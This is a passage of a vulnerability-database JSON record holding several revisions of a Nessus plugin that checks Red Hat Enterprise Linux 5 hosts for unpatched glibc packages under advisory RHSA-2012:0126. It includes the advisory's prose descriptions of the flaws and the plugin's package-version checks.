Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57929);\n script_version (\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2017/01/05 16:04:21 $\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_osvdb_id(65077, 74278, 74883, 77508, 78316);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-1089.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4609.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2012-0126.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n }\n}\n", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "type": "nessus", "viewCount": 6}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2017-10-29T13:33:18"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Updated glibc packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple programs on the system. These packages contain the standard C and the standard math libraries. Without these two libraries, a Linux system cannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked libraries. If an attacker could trick a user into running ldd on a malicious binary, it could result in arbitrary code execution with the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library loaded ELF (Executable and Linking Format) files. If a carefully-crafted ELF file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount helper utilities, did not handle certain errors correctly when updating the mtab (mounted file systems table) file. If such utilities had the setuid bit set, a local attacker could use this flaw to corrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu Security Team acknowledges Dan Rosenberg as the original reporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.", "edition": 6, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "465ecea0c7ac1199bc19bef0fabcafd2ae27c625cec658902258cc044e296acb", "hashmap": [{"hash": "7dd1d3f0577cd1e5fd960493c5598946", "key": "sourceData"}, {"hash": "5a5a54611766f3da3ce3cb528f3027a4", "key": "references"}, {"hash": "ae0665ae2f88d638e0907d932dfcc493", "key": "cpe"}, {"hash": "6f8115c44826ba13de903bb0d26a7d5b", "key": "cvelist"}, {"hash": "7962711bd7650e97eb287d800fd6fd3a", "key": "description"}, {"hash": "8825cfcc6a68eb22807158b2fdce98f8", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2c579aa4e476f52de92baf9b41b1db07", "key": "title"}, {"hash": "7c885de43ac8c8fec677c5a50f1ca9e9", "key": "published"}, {"hash": "3b4231700df65bd1e280187eabbb0395", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c4f16ed276157b63b39f28c10395355d", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=57929", "id": "REDHAT-RHSA-2012-0126.NASL", "lastseen": "2018-08-30T19:30:17", "modified": "2018-07-25T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "57929", "published": "2012-02-14T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2012-0126.html", "https://www.redhat.com/security/data/cve/CVE-2011-4609.html", "https://www.redhat.com/security/data/cve/CVE-2011-1089.html", "https://www.redhat.com/security/data/cve/CVE-2010-0830.html", "https://www.redhat.com/security/data/cve/CVE-2009-5029.html", "https://www.redhat.com/security/data/cve/CVE-2009-5064.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57929);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/07/25 18:58:06\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-1089.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4609.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2012-0126.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n }\n}\n", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "type": "nessus", "viewCount": 6}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-08-30T19:30:17"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple programs on the system. These packages contain the standard C and the standard math libraries. Without these two libraries, a Linux system cannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked libraries. If an attacker could trick a user into running ldd on a malicious binary, it could result in arbitrary code execution with the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library loaded ELF (Executable and Linking Format) files. If a carefully-crafted ELF file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount helper utilities, did not handle certain errors correctly when updating the mtab (mounted file systems table) file. If such utilities had the setuid bit set, a local attacker could use this flaw to corrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu Security Team acknowledges Dan Rosenberg as the original reporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.", "edition": 8, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "925e84948527190ec007c3ade370279e81d72a2e187c5e95ed9982a440d6525c", "hashmap": [{"hash": "ae0665ae2f88d638e0907d932dfcc493", "key": "cpe"}, {"hash": "6f8115c44826ba13de903bb0d26a7d5b", "key": "cvelist"}, {"hash": "7962711bd7650e97eb287d800fd6fd3a", "key": "description"}, {"hash": "31294c7347921e627f969e12c99c16ad", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2c579aa4e476f52de92baf9b41b1db07", "key": "title"}, {"hash": "7c885de43ac8c8fec677c5a50f1ca9e9", "key": "published"}, {"hash": "1d0f91f119b0cb1a966fb011115941b4", "key": "sourceData"}, {"hash": "3b4231700df65bd1e280187eabbb0395", "key": "pluginID"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3c764d4cf584f9ded7aa4dcca57c78ff", "key": "modified"}, {"hash": "c4f16ed276157b63b39f28c10395355d", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=57929", "id": "REDHAT-RHSA-2012-0126.NASL", "lastseen": "2018-11-13T16:43:08", "modified": "2018-11-10T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "57929", "published": "2012-02-14T00:00:00", "references": ["https://www.redhat.com/security/data/cve/CVE-2011-4609.html", "https://www.redhat.com/security/data/cve/CVE-2011-1089.html", "https://access.redhat.com/errata/RHSA-2012:0126", "https://www.redhat.com/security/data/cve/CVE-2010-0830.html", "https://www.redhat.com/security/data/cve/CVE-2009-5029.html", "https://www.redhat.com/security/data/cve/CVE-2009-5064.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57929);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:51\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. 